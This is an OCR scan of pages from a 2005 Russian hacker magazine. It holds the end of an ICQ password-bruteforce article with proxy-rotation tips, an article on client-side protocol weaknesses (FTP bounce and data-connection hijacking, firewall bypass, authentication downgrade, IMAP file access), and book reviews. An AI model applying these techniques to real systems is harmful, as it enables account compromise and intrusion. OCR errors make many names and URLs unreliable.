ргоху-серверы. Второе - совершать 
перебор паролей, пытаясь пройти ау- 
тентификацию на сервере AOL. 

Желательно делать не больше че- 
тырех-пяти итераций перебора паро- 
лей через один ргоху-сервер, вовре- 
мя переходя к следующему ргоху. Ес- 
ли объединить все описанное воеди- 
но, легко можно написать простой, 
быстрый ICQ bruteforce и не только. 
По-хорошему, правильно было бы 
использовать многопоточность. Но 
это уже совсем другая тема, и она 
выходит за рамки этой статьи. Же- 
лаю удачи! 


Отдельный респект следующим лю- 
gsm: Лозовский Александр aka 
Dr.Klouniz [X crew], Шакиров Алексей 
aka Турист [C4 team], Любицкий Сергей 
aka Rusty, Андрейчиков Алексей aka 
andrin и всю команду aolhackers.ru - 
без этих людей жизнь в Сети была бы 


скучной. 


Полные исходники этого примера и 
спецификацию протокола всегда 
можно найти на нашем диске. 
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Дамп пакета с запросом подключения к proxy 
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Дамп пакета с ответом о результате подключения к proxy 
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БЕЗОПАСНОСТЬ 
СЕТЕВЫХ ПРОТОКОЛОВ _ 


ВЗГЛЯД СО СТОРОНЫ КЛИЕНТА 


ажется, что о безопасности сетевых протоколов и их уязвимостях уже написано все. Но такое чувство возникает 
только если взглянуть на проблему с привычной точки зрения - атаки на серверные системы. Сейчас же ведущие 
эксперты ставят на первое место проблему безопасности клиентских систем. 


УРОВНЯ 


СТАНДАРТА - 


ДЫРКИ В ВЕС 

и Проблемы с 6e30- 
пасностью клиентского приложения 
могут начаться еще до завершения 
его написания - в момент, когда выби- 
раются протоколы и стандарты, по ко- 
торым приложение будет работать. 


ИСТОРИЯ ПРОТОКОЛА FTP 

и Говоря о безопасности сетевых 
протоколов, нельзя не рассказать о 
протоколе FTP (File Transfer Protocol - 
протокол передачи срайлов). Nocneg- 
ний стандарт, описывающий протокол 
FTP, RFC 959, относится аж к 1985 го- 
ду, то есть за три года до червя Мор- 
риса - первого события, привлекшего 
общественное внимание к вопросам 
компьютерной безопасности. Червь 
Морриса был хорошим пинком Сети и 
поменял направление ее развития. 
Его польза многократно превосходит 
нанесенные им же убытки. Тогда про- 
токол ЕТР был создан исключительно 
для удобной передачи файлов между 
системами, но без малейшей попытки 
сделать эту передачу безопасной. По- 
ражает тот факт, что этот протокол до 
сих пор используется, причем практи- 
чески в первозданной срорме, в тех 
приложениях, для которых он совер- 
шенно не подходит. 

Протокол ЕТР вообще очень неудо- 
бен в реализации, так как не созда- 
вался для реализации в какой-либо 
клиентской программе. Например, FTP 
не определяет срормат, в котором дол- 
жен выдаваться список файлов. Про- 
токол ЕТР создавался как расширение 
обычного протокола telnet, то есть все 
команды пользователь должен был 
отдавать ЕТР из командной строки и 
подразумевалось наличие у пользо- 
вателя shell-goctyna на ЕТР-сервер. 
ЕТР-клиенты, которые предоставляли 
бы пользователю удобный интерфейс, 
появились значительно позже. 

Протокол ЕТР поддерживает два ре- 
жима: пассивный и активный. Использу- 
ется для передачи срайлов (получения 
или хранения), а также получения ог- 
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лавлений каталогов. В обоих режимах 
ЕТР использует контрольное соедине- 
ние, которое устанавливается клиентом 
на 21-й (по умолчанию) порт ЕТР-серве- 
ра. По контрольному соединению ника- 
кие данные, ни сайлы, ни оглавления 
каталогов не передаются. Для передачи 
любого срайла или оглавления устанав- 
ливается отдельное соединение. 

В активном режиме клиент открыва- 
ет со своей стороны порт, сообщает 
IP-agpec и номер порта серверу в ко- 
манде PORT, сервер устанавливает 
соединение на порт, выбранный кли- 
ентом (в качестве порта источника 
обычно используется 20). 

В пассивном режиме клиент дает ко- 
MaHgy PASV, на что сервер открывает 
ТСР-порт, сообщает ее клиенту, после 
чего клиент устанавливает соедине- 
ние на него. После установки второго 
соединения (DATA connection) клиент 
может дать команду на получение или 
отправку данных, которые и будут пе- 
реданы без какой-либо модификации 
через это дополнительное соедине- 
ние, после чего оно немедленно будет 
разорвано. 


Изначально эти два режима npeg- 
назначались для того, чтобы клиент 
мог переписать файл с одного серве- 
pa на другой, не закачивая сфайл к се- 
бе. Для этого клиент мог установить 
контрольное соединение на сервер А, 
дать ему команду PASV, установить 
соединение на сервер В и дать ему ко- 
MaHgy PORT с данными, переданными 
сервером А в ответ на команду PASV. 
Таким образом, DATA connection уста- 
навливалось между серверами А и В, 
после чего клиент может дать команду 
на хранение сфайла одному серверу и 
передачу файла второму серверу. 


КЛАССИЧЕСКИЕ АТАКИ HA FTP 
ш На первый взгляд, все гениально. 
Недостатки протокола ЕТР впервые 
были подробно описаны экспертом 
лаборатории МА! Дэвидом Сейсердо- 
том (David Sacerdote) только в 1996. В 
чем они заключаются? Что если пос- 
ле того как сервер открыл порт по ко- 
манде PASV, к нему подключится кто- 
то посторонний? Это значит, что когда 
клиент даст команду на получение 
или хранение сфайла, сервер отдаст 
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файл постороннему или получит 
файл, любезно предоставленный пос- 
торонним, а клиент останется ни с 
чем. Такая ситуация называется пе- 
рехватом соединения данных (DATA 
connection hijack). Как посторонний 
может узнать порт, назначенный сер- 
вером, если он не видел ответа на ко- 
MaHgy PASV в контрольном соедине- 
нии? Для этого ему может быть доста- 
точно установить свое контрольное 
соединение и дать команду PASV. В 
большинстве случаев, если он сдела- 
ет это непосредственно перед соеди- 
нением клиента, он получит порт на 
единичку ниже и может попытаться 
атаковать следующий порт. 

Другая классическая атака с ис- 
пользованием особенностей протоко- 
ла FTP связана с командой PORT. Что 
если попросить ЕТР-сервер подклю- 
читься к интересующему нас порту 
постороннего компьютера? Если порт 
закрыт, то мы сразу получим сообще- 
ние об ошибке. А если порт открыт? 
Мы можем заслать туда любой срайл, 
хранящийся на ЕТР-сервере, дав ко- 
MaHgy на получения сфайла. Таким об- 
разом, мы можем использовать ЕТР- 
сервер для атак на чужой компьютер, 
оставаясь при этом в тени. Причем ес- 
ли ЕТР-сервер стоит на пограничном 
компьютере, мы можем атаковать 
компьютер, находящийся во внутрен- 
ней сети. Такая техника называется 
FTP bounce attack (звучит как атака 
рикошетом от ЕТР). 

Но больше всего матерных слов в 
адрес протокола FTP было сказано, 
разумеется, разработчиками различ- 
ных средств защиты, которые должны 
были обеспечить работу этого ЕТР. 
Как, например, обеспечить работу 
ЕТР-клиента с его обратными соеди- 
нениями в активном режиме через 
МАТ? Или работу ЕТР-сервера в пас- 
сивном режиме с его соединениями 
на случайные непривилегированные 
порты за брандмауэром? Открывать 
все порты? Единственное решение, 


которое и используют разработчики, - 
это следить за командами, передавае- 
мыми в контрольном соединении или 
ответами сервера. Например, следить 
за ответом сервера на команду РА$\/ 
и разрешать соединение на указан- 
ный им порт. Однако если файрвол 
работает на сетевом уровне и анали- 
зирует данные только одного |P-nake- 
та, его можно обмануть, "заставив" 
FTP-cepBep сгенерировать пакет с 
нужными данными. Например, выдав 
длинную, заведомо неправильную 
команду, содержащую в конце нуж- 
ные нам данные. При ответе сервера 
сообщением об ошибке, в котором 
сервер повторит команду, будет 
сформировано несколько 1Р-пакетов. 
Можно угадать размер команды так, 
чтобы нужные нам данные пришлись 
на начало второго пакета, и таким об- 
разом заставить файрвол открыть 
нужный порт. 

Еще одна менее распространенная 
атака позволяет просканировать пор- 
ты самого ЕТР-сервера. Для этого ко- 
манда PASV дается множество раз. 
Разумеется, сервером открываются 
только те порты, которые были сво- 
бодны, что позволяет обнаружить 
"занятые" порты. 

Как решаются все этим проблемы? 
Большинство ЕТР-серверов пожерт- 
вовали возможностью прямой пере- 
дачи файлов с сервера на сервер и 
требуют, чтобы соединение на порт 
данных приходило с того же адреса, 
что и контрольное соединение. То же 
касается и команды PORT. Трюк co 
сканированием портов через PASV во 
многих серверах еще проходит, хотя 
кое-где порты открываются в случай- 
ном порядке из ограниченного диапа- 
зона. Современные срайрволы ис- 
пользуют технику stateful inspection, 
при которой "реконструируется" про- 
токол прикладного уровня, а не учи- 
тываются данные отдельных пакетов, 
что устраняет возможность обхода 
файрволов... 


НУ А ЧТО ЖЕ С 
ЕТР-КЛИЕНТОМ? 

m Все классические атаки FTP каса- 
ются сервера. Дэвид Сейсердот напи- 
сал, что атака на перехват соедине- 
ния крайне сложно реализуется для 
сервера и не реализуется для клиен- 
та. К сожалению, статью Дэвида я 
прочитал значительно позже по реко- 
мендации Aleph One. Но ее не читали 
и разработчики серверов ЕТР. Поэто- 
му, когда лет через пять я изобрел ве- 
nocuneg и заново "открыл" эту проб- 
лему, все было в первозданном виде. 
По счастливому стечению обстоя- 
тельств и из-за своей природной лени 
вместо статьи я написал весьма прос- 
тенькую утилитку ftpspy, которая ис- 
пользовала обычный connection flood 
и успешно срабатывала с вероят- 
ностью более 50% на большинстве 
живших тогда FTP-cepBepos. 

А также и на ЕТР-клиентах, только 
не в пассивном, а в активном режиме. 
Правда, для атаки Ha ЕТР-клиента она 
требовала, чтобы на той же машине 
присутствовал ЕТР-сервер, чтобы 
иметь возможность "угадать" порт. 
Если порты назначаются системой 
подряд, то порт можно угадать и gpy- 
гим способом, например "прогнав" 
письмо через почтовый сервер. Ис- 
пользуя техники 5теаЁП-сканирова- 
ния, можно наблюдать за достаточно 
многими портами одновременно. 

Подробнее об истории Ирзру мож- 
но прочитать на имиизесит у лпоули/аг 16$ 
(кроме исторической ценности из 
нее не извлечь ничего, так как в OC- 
новном системы имеют если не безо- 
пасные ЕТР-серверы, то хотя бы за- 
щиту от SYN-cpnyga). 

Все перечисленное требует от меня 
упомянуть проблему обхода брандма- 
уэра через клиент ЕТР. Заставив кли- 
ент загрузить файл с хорошо подог- 
нанным длинным именем с твоего 
ЕТР-сервера, можно "подделать" ко- 
MaHgy PORT и заставить брандмауэр, 
персональный брандмауэр или МАТ с 
трансляцией портов, защищающий 
клиента, пробросить ТСР-порт на ин- 
тересующий порт клиента (например 
139). IP-agpec, как правило, контролиру- 
ется, поэтому дальнейшая атака долж- 
на проводиться с того же сервера. 

Теперь ты знаешь основные недос- 
татки FTP с точки зрения клиента: 
возможность перехвата данных, не- 
достаточная стандартизированность 
и плохая совместимость с брандмауэ- 
рами. Это само по себе уже достаточ- 
ный повод избегать использования 
FTP везде, где только можно :). 


ПРОБЛЕМЫ 
"МОНСТРОИДАЛЬНЫХ" 
ПРОТОКОЛОВ 

m Очень часто проблемы связаны с 
попыткой разработчика сделать про- 
токол слишком универсальным и опи- 
сать в нем как можно больше сфунк- 
ций. Из-за этого получается "монстр", 
реализовать который чрезвычайно 
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Дырки в клие- 
HTCKOM прило- 
жении могут 
возникнуть из- 
за настроек по 
умолчанию - 
из-за выбран- 
ного протокола 
или стандарта. 


FTP изначаль- 
но не был ори- 
ентирован на 
клиента, поэ- 


тому наряду с 
мнимым ygo6- 
ством привнес 
и множество 
проблем. 
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Чем сложнее 
протокол, тем 
выше вероят- 
ность наличия 
бреши в нем. 
Нужно только 
найти. 


Некоторые 
клиентские 
приложения 
выбирают про- 
токол аутенти- 
фикации на 
автомате. 
Можно скло- 
нить пользова- 
теля к выбору 
более пробива- 
емого протоко- 
ла - вплоть go 
открытого 
текста :). 


onl. БЕЗОПАСНОСТЬ СЕТЕВЫХ ПРОТОКОЛОВ ») 


сложно и еще сложнее соблюсти при 
этом безопасность в нем. В качестве 
иллюстрации можно привести прото- 
колы IMAPv4 и POPv3. 

POPv3 - достаточно легковесный 
протокол с минимальным набором ко- 
манд для получения почты. IMAPv4 - 
грузный монстр, который предназна- 
чен для реализации почты в "легком" 
клиенте: в нем все функции (сорти- 
ровки, поиска и хранения сообщений, 
анализа структуры сообщения, рабо- 
ты с вложенными файлами и T.g.) пе- 
рекладываются на сервер. К чему это 
привело? К тому, что кроме един- 
ственной программы pine, написанной 
самими разработчиками протокола, 
никто не поддерживает IMAPV4 в пол- 
ном объеме. Ни одна другая програм- 
ма, включая все популярные почто- 
вые агенты, не использует никакой 
функционал IMAP, которого не было 
бы в РОР (широкая общественность 
глубоко заблуждается, думая, что 
POP3 не поддерживает хранение пи- 
сем на сервере, просмотр части сооб- 
щения, выборочное получение или 
удаление сообщений). В тоже время 
IMAPv4 позволяет работать, напри- 
мер, с любыми файлами, находящими- 
ся на сервере, за пределами почтовой 
папки или ящика пользователя, о чем 
администраторы очень часто даже не 
догадываются. Набор утилит (WW securi- 
ty.nnov.ru/files/imaptools.tqz) позволяет просмат- 
ривать, получать и удалять любые 
файлы с правами почтового пользо- 
вателя через сервер imap-uw. 


2. ОБЩИЕ ПРОБЛЕМЫ 
РАЗЛИЧНЫХ ПРОТОКОЛОВ - 
АУТЕНТИФИКАЦИЯ 
ПОЛЬЗОВАТЕЛЯ 

m= Другая распространенная пробле- 
ма приложения, возникающая еще до 
завершения его написания, - выбор 
протокола аутентификации пользова- 
теля. Аутентификация - это процесс, в 
результате которого сервер узнает, 
кем является подключающийся поль- 
зователь. В настоящее время наибо- 
лее распространенным методом ау- 
тентификации для сервисов Internet 
является проверка имени и пароля 
пользователя. 

Что можно сказать о наиболее расп- 
ространенных протоколах? 

Протокол передачи почты SMTP 
(действующим стандартом является 
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RFC 821, более свежий RFC 2821 не 


получил такого статуса и, скорее все- 
го, никогда не получит) He предусмат- 
ривает аутентификации пользовате- 
ля. По идее это означает, что SMTP- 
сервисом может пользоваться любой 
желающий, и каждая же собака смо- 
жет подменить адрес отправителя со- 
общения или разослать спам через 
почтовый сервис. На практике ис- 
пользуется аутентификация и автори- 
зация (определение, какими именно 
функциями сервера может пользо- 
ваться клиент) по IP-agpecy. Как пра- 
вило, почтовый сервер не позволяет 
клиентам "чужих" сетей использовать 
сервер в качестве релея, то есть отп- 
равлять почту кому-либо, кроме полу- 
чателей, обслуживаемых данным сер- 
вером. Имеется расширение протоко- 
ла SMTP - С 2554, которое предусмат- 
ривает возможность аутентификации 
и подразумевает, что основным мето- 
дом аутентификации должна быть ау- 
тентификация по методу запрос-от- 
вет. Однако на практике наиболее 
распространенным и совместимым ме- 
тодом является AUTH LOGIN, при ко- 
тором логин и пароль пользователя 
передаются в открытом виде. Прове- 
рить, какие протоколы аутентифика- 
ции поддерживаются сервером, мож- 
но с помощью команды ЕНЕО: 
Данный сервер поддерживает ау- 
тентификацию по методу LOGIN (отк- 
рытым паролем), NTLM и GSSAPI. 
Протокол НТТР (действующий стан- 
дарт RFC 2616) определяет возмож- 
ность аутентификации пользователя, 
но не дает каких-пибо конкретных ме- 
ханизмов. RFC 2617 определяет воз- 
можность аутентификации паролем в 
открытом тексте, называемую в НТТР 
Basic или по методу запрос-ответ 


(challenge/response), который в HTTP 
называется Digest. Однако аутенти- 
фикация паролем в открытом виде на 
сегодня является единственным мето- 
дом, поддерживаемым во всех расп- 
ространенных браузерах и web-cepBe- 
рах. Поддерживаемые сервером мето- 
ды аутентификации видны из заго- 
ловка WWW-Authenticate, который 
сервер дает при запросе на аутенти- 
фикацию: 


Content-Length: 1037 

Content-Type: text/html 

Server: Microsoft-1IS/6.0 

WWW-Authenticate: Basic www.domain.example 
WWW-Authenticate: Negotiate 
WWW-Authenticate: NTLM 

X-Powered-By: ASP.NET 

Date: Wed, 13 Jul 2005 20:33:28 GMT 


Видно, что сервер поддерживает ay- 
тентификацию Basic, Negotiate и 
NTLM. 

Протокол FTP поддерживает исклю- 
чительно аутентификацию в открытом 
тексте, хотя и для него есть расшире- 
ния, аналогичные AUTH в SMTP оля ау- 
тентификации методом запрос-ответ. 

Протокол POP3 (RFC 1939) noggep- 
живает два метода аутентификации: 
аутентификацию в открытом тексте и 
аутентификацию АРОР по методу зап- 
рос-ответ. Кроме того, опять же име- 
ются расширения, аналогичные AUTH 
в SMTP. Отличить сервер, поддержи- 
вающий АРОР, достаточно легко по 
баннеру сервера. 


+0K Microsoft Exchange Server 2003 РОРЗ server version 
6.5.1226.0 (pop3-1.domain.example) ready. 


Этот сервер не поддерживает APOP. 


+ОК 3APA3A/POP3-2.0-RC5.1 <3707.1121287575@ pop3- 
2.domain.example > 


А этот сервер поддерживает APOP, 
что видно по части приветствия, зак- 
люченной в угловые скобки. Эта 
часть приветствия используется в 
АРОР в качестве запроса (challenge). 

Несколько сложнее с поддержкой 
расширенной аутентификации по ме- 
тодам AUTH. Ее наличие и разрешен- 
ные методы иногда можно проверить 
с помощью команд САРА или коман- 
ды AUTH без параметров. 


<<220 mailserver.domain.example Microsoft 
ESMTP MAIL Service, Version: 6.0.3790.1 830 
ready at Thu, 14 Jul 2005 00:21:38 +0400 

>EHLO ME 

<<250- —mailserver.domain.example Hello 
(172.22.22.227] 

<<250-TURN 

<<250-SIZE 

<<250-ETRN 

<«250-PIPELINING 

<<250-DSN 

<<250-ENHANCEDSTATUSCODES 

<<250-8bitmime 

<«250-BINARYMIME 

<«250-CHUNKING 

<<250-VRFY 

<<250-X-EXPS GSSAPI NTLM LOGIN 
<<250-X-EXPS=LOGIN 

<<250-AUTH GSSAPI NTLM LOGIN 
<<250-AUTH=LOGIN 

<<250-XEXCHS0 

<<250 OK 


АУТЕНТИФИКАЦИЯ В 
ОТКРЫТОМ ТЕКСТЕ (PLAIN 
TEXT, OH ЖЕ USER/PASS В FTP 
И РОРЗ, OH ЖЕ AUTH LOGIN В 
SMTP И IMAP, ОН ЖЕ BASIC В 
HTTP) 

и Что представляет собой каждый 
метод парольной аутентификации и 
какие недостатки он имеет? 

Недостатки метода очевидны: па- 
роль передается "по проводам" отк- 
рытым текстом и может быть перехва- 
чен в случае прослушиваемой разде- 
ляемой сети с помощью АБР poison- 
ing, DNS poisoning, при компрометации 
сервера или другими методами, об- 
суждение которых выходит за рамки 
статьи. При использовании SMTP и 
НТТР логин и пароль передаются в 
кодировке baseé4. 


АУТЕНТИФИКАЦИИ ПО 
CHALLENGE-RESPONSE 
(ЗАПРОС-ОТВЕТ) С ПОМОЩЬЮ. 
СТАНДАРТНЫХ ХЭШ-ФУНКЦИЙ 

м К этим методам можно отнести 
APOP, AUTH CRAM-MD5 и Digest в 
HTTP, реже используются другие 
СКАМ-методы, например CRAM-MD4 и 
CRAM-SHAI. При использовании такой 
аутентификации пароль пользовате- 
ля никогда не попадает в провода. 
Причем даже криптографические 
проблемы $НА] или слабые генерато- 
ры случайных чисел при генерации 
challenge практически не сказывают- 
ся на уровне защиты пароля. Однако 
следует помнить, что Challenge- 
Response не защищает от атак на под- 
бор слабых паролей (bruteforce), если 
пароль короткий или подбирается по 
словарю. 


ВСТРОЕННАЯ 
АУТЕНТИФИКАЦИЯ WINDOWS 

ш Это AUTH NTLM и аутентифика- 
ции NTLM и Negotiate в HTTP. В 
Outlook Express встроенная аутенти- 
фикация NTLM называется SPA 
(Secure Password Authentication). He- 
достатки такой аутентификации: 

@. Ее прозрачность (при такой ау- 
тентификации сначала пробуется имя 
и пароль, с которыми осуществлен 
вход в систему). 

@. Невозможность подключиться к 
одному и тому же серверу с несколь- 
кими учетными записями (относится 
ко многим версиям Windows). 

@. Возможность атак релеинга ay- 
тентификации в случае NTLM. 

Об этом классе атак и других особен- 
ностях и недостатках NTLM подробно 
рассказывается в статье "NTLM и кор- 
поративные сети" (Wi securily.nnov.ru/articles/ntln). 
Использовать встроенную аутентифи- 
кацию Windows (и в частности SPA) с He- 
доверенными серверами ни в коем слу- 
чае нельзя! 


АУТЕНТИФИКАЦИЯ KERBEROS 

ш Это AUTH GSSAPI и ПЫр-аутенти- 
фикация Negotiate. Kerberos - един- 
ственная аутентификация, при кото- 
рой в процессе аутентификации про- 
веряется IP-agpec клиента и сервера. 
Это защищает (разумеется, при пол- 
ной и правильной реализации 
Kerberos) от атак релеинга и подмены 
сервера, от которых не спасают все 
прочие виды аутентификации. К со- 
жалению, из-за своей достаточно 
сложной топологии в Сети Kerberos 
практически неприменим, и он ис- 
пользуется преимущественно в кор- 
поративных сетях, так как подобную 
аутентификацию сложно использо- 
вать через МАТ или прокси. 

Во многих случаях клиентское при- 
ложение самостоятельно выбирает 
наиболее "мощный" протокол аутен- 
тификации. Так поступают, например, 
практически все клиенты НТТР (брау- 
зеры). Хотя бывают и досадные недо- 
разумения, например в Mozilla Firefox 
(wwwsecurity.nnov.ru/Fnews19.html). 

На первый взгляд, такое поведение 
вполне оправданно, но у него есть ог- 
ромный недостаток: атакующий, кото- 
рый имеет возможность контролиро- 
вать трафик между клиентом и серве- 
ром (активные атаки Man-in-the- 
Middle, например в случае подмены 
сервера или релеинга соединения), 
может "заставить" клиента переполз- 
ти на более мягкий протокол аутенти- 
фикации, вплоть до открытого текста. 

Разумеется, после всего вышепере- 
численного можно порекомендовать 
использовать в клиентском приложе- 
нии Кегбего$-аутентификацию либо, в 
случае если она недоступна, аутенти- 
фикацию Challenge-Response. 

Кроме того, все современные прото- 
колы поддерживают ТЕ 5$-версию 
(Transport Layer Security - протокол, 
поглотивший SSL). При условии что 


работа с сертификатами реализована 
некорректно, TLS обеспечивает на- 
дежную защиту данных от перехвата 
и подмены, а также взаимную аутен- 
тификацию клиента и сервера на ос- 
нове сертификатов. Если есть такая 
возможность, TLS нужно внедрять и 
использовать. 


3. ОШИБКИ РЕАЛИЗАЦИИ 
СЕТЕВЫХ ПРОТОКОЛОВ В 
КЛИЕНТСКИХ ПРИЛОЖЕНИЯХ 

и Хотя это и могло бы быть вкус- 
ным, мы не будем подробно разби- 
рать уязвимости конкретных реализа- 
ций. На момент написания статьи в ба- 
зе уязвимостей (www.security.nnov.ru) 
577 клиентских ошибок (более 10%). 
Назовем только наиболее распрост- 
раненные проблемы: 

и Переполнение буфера, ошибки 
форматной строки, целочисленные 
переполнения. 

Ошибки, связанные с плохим стилем 
программирования. Очень часто воз- 
никают при разборе клиента ответа 
на команду или даже при просто 
длинном приветственном сообщении 
сервера. 

и Манипуляция данными. 

Сюда можно отнести проблемы меж- 
сайтового скриптинга или подмены 
содержимого в браузерах и почтовых 
программах. Подобные ошибки, как 
правило, связаны с плохим дизайном 
программы. 

и Отказ в обслуживании. 

Возникает при разборе сложных или 
нестандартных данных и может при- 
вести к зависанию приложения (веч- 
ным циклам) или краху. Чаще всего 
возникает из-за невозможности обра- 
ботать исключительные или гранич- 
ные ситуации. 

и Недостаточная проверка данных. 
Например, недостаточная проверка 
пути доверия сертисриката или обрат- 

ный путь в каталогах, при котором 
серверное приложение может управ- 
лять тем, в какую папку попадет 
файл, загруженный клиентом. 

и Утечка информации. 

Клиент передает данные о себе сис- 
теме, в которой оно работает, или 
пользователю. И передает больше, 
чем нужно. 


ПОРА ДЕЛАТЬ ВЫВОДЫ 

и Необходимо учитывать многие 
аспекты безопасности клиентских 
приложений: безопасность исполь- 
зуемого протокола передачи данных, 
безопасность выбранного метода ау- 
тентификации и шифрования, каче- 
ство кода клиентского приложения. 
Любое обращение клиентского при- 
ложения на сервер связано с некото- 
рым обменом данных. Эти данные мо- 
гут быть "хорошими" или "плохими", 
о чем очень часто забывают разра- 


ботчики. 


На сайте 
www.security.n 
поу.ги есть ба- 
за данных, в 
которой собра- 
ны практически 
все известные 
уязвимости. 


Досадное не- 
доразумение 
Mozilla Firefox: 


www.security.n 
nov.ru/Fnews19 
-htmi. 
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Каролик Андрей (andrusha@real.xakep.ru) 


ЧТО ПОЛИСТАТЬ 


С этим обзором было сложно, так как все в отпусках, включая издатель- 
ства, в которых мы заказывали книги для обзора. Пришлось изрядно 
пометаться, чтобы собрать книжки и сохранить любимую тему. Но труднос- 


ти позади :). 


ИСКУССТВО ЗАЩИТЫ И 
ВЗЛОМА ИНФОРМАЦИИ 


СПб.: БХВ-Петербург 


2004 


Скляров Д.В. 


288 страниц 


Разумная цена: 1И рублей 


ресурсами, доступ к фай- 
лам и реестру, содержимое 
оперативной памяти, уст- 
ройства ввода и вывода, 
сетевой обмен, библиотеч- 
ные функции и т.п. И прог- 
ноз от автора, что ждать в 
будущем. 


ПРОГРАММИРОВАНИЕ 
ДРАЙВЕРОВ И СИСТЕМ 
БЕЗОПАСНОСТИ 


СПб.: БХВ-Петербург 


Если кто-то раньше и 

не знал Склярова, то 
в июле 2001 года наверняка 
слышал про его арест ФБР 
за создание продукта, поз- 
воляющего обходить защи- 
ту электронных книг в фор- 
мате Adobe PDF. Парня пы- 
тались упечь в тюрьму на 
25 лет, заодно запросив 
штраф в более чем два 
миллиона долларов. В кон- 
Це 2002 года обвинения 
были сняты. Позже появи- 
лась эта книга о защите ин- 
формации - о защите прог- 
рамм от несанкционирован- 
ного тиражирования, циф- 
ровые права и стеганогра- 
фию. В книге есть примеры 
неудачных средств защиты 
с указанием причин возник- 
новения проблем. В дове- 
сок ко всему автор описы- 
вает инструментарий иссле- 
дователя: чем копаться в 
программах, как анализиро- 
вать код программ, работа с 


ХАКЕРСПЕЦ | 09(58) | 2005 


2003 


Сорокина С.И. 


256 страниц 


Разумная цена: 87 рублей 


Толщина книги, ко- 
[>> нечно, маловата для 
обозначенной темы, но это 
учебное пособие, а не по- 
собничество в решении 
всех возможных проблем. 
Акцент книги - на использо- 
вании средств защиты сете- 
вой информации на различ- 
ных уровнях сетевой архи- 
тектуры Windows NT/2000. 
Сначала автор предлагает 
разобраться, что же такое 
драйвер, каких типов он бы- 
вает и с чем его едят (какие 
средства разработки драй- 
веров существуют). Далее 
идет погружение в общую 
архитектуру Windows МТ 
(характеристики, структура, 
режим ядра, установка/уда- 
ление/запуск/остановка 
драйвера и T.g.), а затем и в 
сетевую архитектуру 


Windows МТ (сетевые API, 
программные компоненты и 
связь между ними). Все ос- 
тальное посвящено анали- 
зу сетевой архитектуры и 
возможностям реализации 
средств защиты и анализа 
сетевого трафика. Плюс об- 
щие вопросы обеспечения 
безопасности в операцион- 
ной среде Windows 
МТ/2000. 


СЕКРЕТЫ ХАКЕРОВ. 
БЕЗОПАСНОСТЬ 
WINDOWS SERVER 2003 - 
ГОТОВЫЕ РЕШЕНИЯ 


М.: Издательский дом "Вильямс" 
2004 

Джоел Скембрей 

256 страниц 

Разумная цена: 507 рублей 


Если ты используешь 

систему семейства 
Windows или же конкретно 
Windows Server 2003, имеет 
смысл полистать эту книгу. 
В ней собраны примеры 
классических атак на 
Windows-cucTeMbI и меры 
противодействия этим ата- 
кам, ради которых авторы 
рассказывают об арсенале, 
используемом современны- 
ми хакерами при атаках. На 
реальных примерах рас- 
смотрены приемлемые мето- 
ды противодействия конк- 
ретной атаке. Защита 
служб NetBIOS, MSRPC, 
SMS, DNS, SNMP u Active 


Directory с описанием атаки 
на интерфейс MSRPC. Nog- 
робности архитектуры 15$ 6 
и атака на переполнение 
буфера для файлов .htr. 
Информация о службе 
Terminal Services, новые ме- 
тоды подбора пароля, рас- 
ширения привилегий и пе- 
рехвата данных. Современ- 
ные способы защиты от 
атак отказа в обслуживании 
и многое другое. 


ЗАЩИТА ОТ ХАКЕРОВ 
БЕСПРОВОДНЫХ СЕТЕЙ 


С появлением беспро- 

водных сетей стало 
меньше проблем, проводов 
и вопросов с расстоянием. 
Но актуальность проблемы 
безопасности передавае- 
мых и хранящихся данных 
не снизилась. И не важно, 
пользуешься ты беспровод- 
ной сетью на работе или ус- 
тановил беспроводной 
шлюз дома. Хакеры есть 
везде :). Тебе необходимо 
понять ограничения по бе- 
зопасности, которые накла- 
дывают стандарты и прото- 
колы, и установить проце- 
дуры классификации ин- 
формации. Далее будет не 
лишним разобраться, что 
такое перехват и прослуши- 
вание, какие средства ис- 
пользуются при этом, то 
есть поставить себя на мес- 
то хакера и понять их логи- 
ку выбора средств и обору- 
дования для атаки. Тогда 
будет проще разработать, 
развернуть безопасную 
сеть и протестировать ее на 
предмет беспроводной 
безопасности. 


ИНТЕРНЕТ: РЕАЛЬНЫЕ И 
МНИМЫЕ УГРОЗЫ 


Прикольная книжен- 

ция с реальными ис- 
ториями от абсолютно ре- 
альных людей о том, как 
они защищаются от кражи 
персональных данных, ви- 
русов, разных видов мо- 
шенничества и прочей не- 
чисти. Автор - профессио- 
нальный репортер, правда, 
из-за бугра. В книге подбор- 
ка историй, которые не пов- 
торяют друг друга, а взаи- 
модополняют. В итоге чита- 
тель может получить предс- 
тавление о том, как и зачем 
ставить брандмауэр 
ZoneAlarm, выключать обмен 
файлами, обеспечивать безо- 
пасность почтового ящика, 
менять пароли, использовать 
антивирусную программу, ав- 
томатически обновлять анти- 
вирусную базу, отключать 
автоматическую загрузку 
грасрики в электронных пись- 
мах, использовать детектор 
программ-шпионов. И еще 
куча полезных советов в том 
же духе. 


ЗАПИСКИ 
ИССЛЕДОВАТЕЛЯ 
КОМПЬЮТЕРНЫХ 
ВИРУСОВ 


2005 


316 страниц 


Очередной эпос от 

всеми любимого Кри- 
са (в этом номере "Хакер 
Спец", кстати, есть его 
статьи - прим. редактора). 
Сие творение посвящено 
борьбе с вирусами, точнее, 
обнаружению и удалению 
существующих и несущест- 
вующих вирусов. Крис дос- 
таточно просто рассказыва- 
ет о червях и вирусах, а 
дальше переходит на прак- 
тические меры по их ист- 
реблению. В книге есть про: 
критическую ошибку в 
SVCHOST.EXE, основные 
признаки внедрения виру- 
са, анатомию червей и ме- 
ханизмы их распростране- 
ния, способы обнаружения 
и борьбы с червями, секре- 
ты проектирования Shell-Ko- 
да, возможности брандмауэ- 
ра, резервное копирование, 
уменьшение привилегий go 
минимума, сокращение из- 
быточной функциональнос- 
ти программ, мониторинг из- 
менения срайлов, симптомы 
заражения вирусом, меха- 
низмы аутентификации, уг- 
розу переполнения буфера 
и дальше по списку. 


ВВЕДЕНИЕ В 
КРИПТОГРАФИЮ 


При виде напечатан- 

ного слова "учебник" 
пробивает на ностальгию :). 
По сути, это учебное посо- 
бие для учащихся матема- 
тических специальностей, у 


Ш Любые из описанных книжек, которые тебя заинтересовали, можешь за- 
казать (по разумным ценам), не отрывая пятой точки от дивана или стула, в 


букинистическом интернет-магазине "О$-Книга" - www.osbook.ru. Книги для 
обзора мы брали именно там. 


кого есть предмет "Крипто- 
графия". От простых приме- 
ров и основных понятий go 
современных криптографи- 
ческих подходов. Если ус- 
ловно разделить книгу на 
независимые темы, то в нее 
вошли: основные понятия 
криптографии, теория 
сложности в криптографии, 
криптографические прото- 
